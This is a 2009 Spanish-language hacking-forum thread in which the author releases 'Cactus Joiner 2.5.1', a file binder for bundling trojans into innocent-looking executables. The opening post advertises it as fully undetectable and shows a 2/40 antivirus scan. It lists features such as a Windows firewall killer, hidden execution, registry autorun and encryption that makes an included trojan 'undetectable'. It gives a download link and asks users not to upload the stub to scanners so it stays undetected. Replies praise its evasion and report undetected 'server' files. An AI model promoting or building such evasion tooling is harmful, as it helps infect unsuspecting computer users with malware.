elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 09:14  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  [!] - Cactus Joiner 2.5.1 - FUD (2/40) 02/04/09 by MadAntrax
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [!] - Cactus Joiner 2.5.1 - FUD (2/40) 02/04/09 by MadAntrax  (Leído 10,512 veces)
||MadAntrax||
Lab Member
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.525


Mala hierba nunca muere!


Ver Perfil WWW
[!] - Cactus Joiner 2.5.1 - FUD (2/40) 02/04/09 by MadAntrax
« en: 2 Abril 2009, 15:52 »

Actualizado Cactus Joiner 2.5.1

Fecha de última actualización: 02/Abr/09

Aún me quedan unos días para terminar el Cactus Joiner 3.0 Por eso he decidido modificar la versión anterior del Cactus Joiner 2.5... dando paso a la nueva versión 2.5.1

Que tiene de especial esta version?

Nada, es lo mismo que la versión 2.5 pero FUD (Full Undetected), el nuevo cactus.dll ha sido reprogramado de nuevo, se ha añadido cifrado con el algoritmo ROT39(). A parte de eso no tiene ninguna mejora nueva.

Pantalla Principal


Opciones Avanzadas


Guardar el Joiner


Código:
Reporte actual: 02/04/2009

Motor antivirus  Versión  Última actualización  Resultado
a-squared         4.0.0.101 2009.04.02 -
AhnLab-V3         5.0.0.2 2009.04.02 -
AntiVir         7.9.0.129 2009.04.02 -
Antiy-AVL         2.0.3.1 2009.04.02 -
Authentium 5.1.2.4 2009.04.01 W32/VB-Wird-based!Maximus
Avast         4.8.1335.0 2009.04.02 -
AVG                 8.5.0.285 2009.04.02 -
BitDefender 7.2    2009.04.02 -
CAT-QuickHeal 10.00 2009.04.01 -
ClamAV         0.94.1 2009.04.02 -
Comodo         1093 2009.04.01 -
DrWeb         4.44.0.09 2009.04.02 -
eSafe         7.0.17.0 2009.04.02 -
eTrust-Vet         31.6.6430 2009.04.02 -
F-Prot         4.4.4.56 2009.04.01 W32/VB-Wird-based!Maximus
F-Secure         8.0.14470 2009.04.02 -
Fortinet         3.117.0.0 2009.04.02 -
GData         19      2009.04.02 -
Ikarus         T3.1.1.49 2009.04.02 -
K7AntiVirus 7.10.690 2009.04.01 -
Kaspersky         7.0.0.125 2009.04.02 -
McAfee         5571 2009.04.01 -
McAfee+Artemis 5571 2009.04.01 -
McAfee-GW-Edition 6.7.6 2009.04.01 -
Microsoft         1.4502 2009.04.02 -
NOD32           3983 2009.04.02 -
Norman         6.00.06 2009.04.01 -
nProtect     2009.1.8.0 2009.04.02 -
Panda     10.0.0.14 2009.04.02 -
PCTools       4.4.2.0 2009.04.02 -
Prevx1               V2 2009.04.02 -
Rising 21.23.32.00 2009.04.02 -
Sophos         4.40.0 2009.04.02 -
Sunbelt     3.2.1858.2 2009.04.02 -
Symantec       1.4.4.12 2009.04.02 -
TheHacker     6.3.4.0.298 2009.04.01 -
TrendMicro  8.700.0.1004 2009.04.02 -
VBA32     3.12.10.2 2009.04.02 -
ViRobot 2009.4.2.1673 2009.04.02 -
VirusBuster 4.6.5.0 2009.04.01 -

Las 2 detecciones son falsos positivos. Además nadie usa esos Antivirus en la vida real :)

Novedades versión 2.5.1
*- Código del stub re-programado desde el principio
*- Añadido algoritmo interno de cifrado por ROT39()
*- Eliminado el objeto "Firewall.Policy" para evadir la heurística de los AV
*- Eliminado el algoritmo StrReverse en las Strings internas del Stub

Todo lo demás ya estaba en la versión 2.5:

*- Añadido: Sistema de Firewall Killer
*- Añadido: Nuevo sistema de cifrado (StrReverse)
*- Añadido: Se pueden unir infinitos archivos en 1 solo!
*- Añadido: Opción para auto-ejecutar los archivos en Regedit
*- Añadido: Opción para personalizar la Deploy Folder.
*- Añadido: Opción para personalizar el Output Name.
*- Añadido: Opción para cambiar el icono del ejecutable.
*- Añadido: Contador de archivos en el listado.
*- Añadido: Contador de tamaño de archivos en el listado.
*- Añadido: Biblioteca con 69 iconos.
*- Mejora: El tamaño de cactus.dll (stub) se ha reducido.
*- Mejora: El icono por defecto de cactus.dll es invisible.
*- Mejora: Se ha mejorado el GUI (Graphic User Interface), más compacto.
*- Mejora: Ventana de Opciones Avanzadas.
*- Mejora: Mejora en el menú contextual del listado.
*- Mejora: El método de cifrado es ahora mucho más eficiente.
*- Mejoras en el código interno:
   (*) Mejoras en el control de errores
   (*) Ejecución y compilación del joiner un 35% más rápida
   (*) Agregado sistema de detección de falta de archivos (cactus.dll)
   (*) Se ha eliminado el objeto 'Scripting.FileSystemObject'

*- Se puede añadir cualquier formato de archivo: programas, fotos, textos, videos, mp3, etc...
*- Permite seleccionar la forma de ejecución de los archivos. (normal / oculto).
*- Permite seleccionar que archivo se va a auto-ejecutar por Regedit.
*- Firewall Killer, deshabilita el firewall de Windows XP.
*- cifrado: Permite cifrar el contenido de los archivos. Si se incluye un troyano, este se volverá indetectable!
*- Se puede cambiar el icono del programa final
*- El archivo final puede ser con extensión: exe, com, bat, scr, cmd o pif.



AVISO IMPORTANTE: NO mandeis el archivo cactus.dll a virustotal ni a ningún antivirus online, de esta forma el Cactus permanecerá más tiempo indetectable, si por alguna razón el Cactus se vuelve detectado por los antivirus avísame y crearé una versión del cactus.dll en tan solo unos días.



ERROR: Si os aparece un mensaje de error al abrir el Cactus diciendo que os falta el archivo COMDLG32.OCX sigue leyendo...

1) Descarga el archivo COMDLG32.OCX aqui
2) Copia el archivo dentro de tu carpeta del sistema (C:\Windows\System32\COMDLG32.OCX)
3) Registra el OCX usando el comando: regsvr32 C:\Windows\System32\COMDLG32.OCX para ello escribe lo que hay en negrita dentro del cuadro Menu Inicio/Ejecutar y pulsa Enter
4) Disfruta de Cactus Joiner :P



Descarga: http://cactus-software.elhacker.net/Cactus_Joiner_2.5.1.zip
« Última modificación: 2 Abril 2009, 19:04 por ||MadAntrax|| » En línea

invisible_hack


Desconectado Desconectado

Mensajes: 981


Invisible_Hack™ Nick Registrado ^^


Ver Perfil WWW
Re: [!] - Cactus Joiner 2.5.1 - FUD (2/40) 02/04/09 by MadAntrax
« Respuesta #1 en: 2 Abril 2009, 16:06 »

Muy bueno, aunque creo que lo bueno estará por llegar en la 3.0 pero de momento, estas mejorando lo ya hecho ^^

Por cierto esos dos AV`S que lo detectan nisikiera los conocía...jajaja...

Saludos.
En línea

"Si no visitas mi blog, Chuck te dará una patada giratoria"
[Zero]
Moderador
***
Desconectado Desconectado

Mensajes: 1.050


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: [!] - Cactus Joiner 2.5.1 - FUD (2/40) 02/04/09 by MadAntrax
« Respuesta #2 en: 2 Abril 2009, 22:25 »

La madre, F-Prot no te lo detecta como ElDorado, sino como otro virus, la primera vez que lo veo, jaja. Buena modificación, no es fácil hacer algo fund en vb   ;).

Saludos
En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
NERV

Desconectado Desconectado

Mensajes: 42



Ver Perfil
Re: [!] - Cactus Joiner 2.5.1 - FUD (2/40) 02/04/09 by MadAntrax
« Respuesta #3 en: 4 Abril 2009, 03:04 »

Hola..
Simplemente queria agradecerte y felicitarte es un trabajo realmente admirable..
Lo he probado y me dejo el server con un exe totalmente indetectable a Eset Smart Security
En línea

Lo que sabemos es una gota de agua; lo que ignoramos es el océano.
Isaac Newton
crasite

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: [!] - Cactus Joiner 2.5.1 - FUD (2/40) 02/04/09 by MadAntrax
« Respuesta #4 en: 12 Abril 2009, 13:45 »

i dunno why but someone upload to virustotal or something then it's detectable now!!
En línea
||MadAntrax||
Lab Member
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.525


Mala hierba nunca muere!


Ver Perfil WWW
Re: [!] - Cactus Joiner 2.5.1 - FUD (2/40) 02/04/09 by MadAntrax
« Respuesta #5 en: 14 Abril 2009, 11:50 »

i dunno why but someone upload to virustotal or something then it's detectable now!!


Don't worry, I'm working on a new FUD cactus.dll (stub), will be relased soon... ;)
En línea

Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.132


Se siente observado ¬¬'


Ver Perfil
Re: [!] - Cactus Joiner 2.5.1 - FUD (2/40) 02/04/09 by MadAntrax
« Respuesta #6 en: 14 Abril 2009, 13:02 »

i dunno why but someone upload to virustotal or something then it's detectable now!!


Don't worry, I'm working on a new FUD cactus.dll (stub), will be relased soon... ;)

No es necesario que hagas todo el trabajo Mad...

Acaso no liberaste el code?
Citar

Quien quiera hacerlo FUD que lo haga :P, aunque bueno, siempre queda mejor que lo haga el autor ;D

Saludos ;)

PD:Recivi tu MP ;)
En línea

R0NPSP

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: [!] - Cactus Joiner 2.5.1 - FUD (2/40) 02/04/09 by MadAntrax
« Respuesta #7 en: 16 Abril 2009, 21:11 »

Gracias macho eres un fiera ,voy aver si lo manejo  ;D

Edito:Al meterme a

http://cactus-software.elhacker.net/Cactus_Joiner_2.5.1.zip

me dice que no se puede encontrar la pagina :S

Las subido desde algun otro lado?

gracias ||MadAntrax||
« Última modificación: 16 Abril 2009, 21:18 por R0NPSP » En línea
||MadAntrax||
Lab Member
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.525


Mala hierba nunca muere!


Ver Perfil WWW
Re: [!] - Cactus Joiner 2.5.1 - FUD (2/40) 02/04/09 by MadAntrax
« Respuesta #8 en: 16 Abril 2009, 22:13 »

Gracias macho eres un fiera ,voy aver si lo manejo  ;D

Edito:Al meterme a

http://cactus-software.elhacker.net/Cactus_Joiner_2.5.1.zip

me dice que no se puede encontrar la pagina :S

Las subido desde algun otro lado?

gracias ||MadAntrax||

Problemas con el hosting... en unas horas estará online otravez
En línea

obokamane

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: [!] - Cactus Joiner 2.5.1 - FUD (2/40) 02/04/09 by MadAntrax
« Respuesta #9 en: 19 Mayo 2009, 01:44 »

hola a todos,
usé este joiner y me gustó mucho pero hay algo raro que me ocurre a pesar de que sigo los pasos correctamente. Hice la prueba en mi PC y compilé 2 archivos A.exe+B.exe.
 Lo que ocurre es que cuando ejecuté el archivo compilado resultante.exe, automáticamente en la carpeta del sistema me aparecieron los 2 archivos A.exe y B.exe en primer plano!  :o. Hice algo mal? Se puede evitar esto?

Saludos.
En línea
tito.

Desconectado Desconectado

Mensajes: 12


Ver Perfil
Re: [!] - Cactus Joiner 2.5.1 - FUD (2/40) 02/04/09 by MadAntrax
« Respuesta #10 en: 11 Julio 2009, 23:36 »

me sale este error =(

http://img38.imageshack.us/img38/7708/neuestextdokument.jpg

alguien me pude ayudar?
En línea
Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.132


Se siente observado ¬¬'


Ver Perfil
Re: [!] - Cactus Joiner 2.5.1 - FUD (2/40) 02/04/09 by MadAntrax
« Respuesta #11 en: 12 Julio 2009, 01:47 »

me sale este error =(

http://img38.imageshack.us/img38/7708/neuestextdokument.jpg

alguien me pude ayudar?

Desactiva cualquier proteccion tipo AV... y redescargalo... a mi me descarga bien...
En línea

ny0x


Desconectado Desconectado

Mensajes: 334



Ver Perfil
Re: [!] - Cactus Joiner 2.5.1 - FUD (2/40) 02/04/09 by MadAntrax
« Respuesta #12 en: 12 Julio 2009, 02:00 »

es porque no tienes el activex comdlg32, descargalo de http://www.nodevice.es/dll/COMDLG32_OCX/item4740.html y registralo con Regsvr32 ruta_donde_guardaste_la_ocx
En línea
tito.

Desconectado Desconectado

Mensajes: 12


Ver Perfil
Re: [!] - Cactus Joiner 2.5.1 - FUD (2/40) 02/04/09 by MadAntrax
« Respuesta #13 en: 12 Julio 2009, 20:58 »

grasia funktiono... me falto otro dato pero lo busco en google y funsoino

thx

and the Joiner is no more FUD

de 41 antivirus solo 11 no lo detedaron =(

detodasforma gracias
En línea
YST


Desconectado Desconectado

Mensajes: 963


I'm you


Ver Perfil WWW
Re: [!] - Cactus Joiner 2.5.1 - FUD (2/40) 02/04/09 by MadAntrax
« Respuesta #14 en: 18 Julio 2009, 19:40 »

grasia funktiono... me falto otro dato pero lo busco en google y funsoino

thx

and the Joiner is no more FUD

de 41 antivirus solo 11 no lo detedaron =(

detodasforma gracias
Por gente como tu ya no es mas FUD , que lo mandas a virus total  >:(
En línea



Yo le enseñe a Kayser a usar objetos en ASM
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
CACTUS JOINER
Dudas Generales
guxar_02 1 1,207 Último mensaje 28 Diciembre 2010, 00:34
por skapunky
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines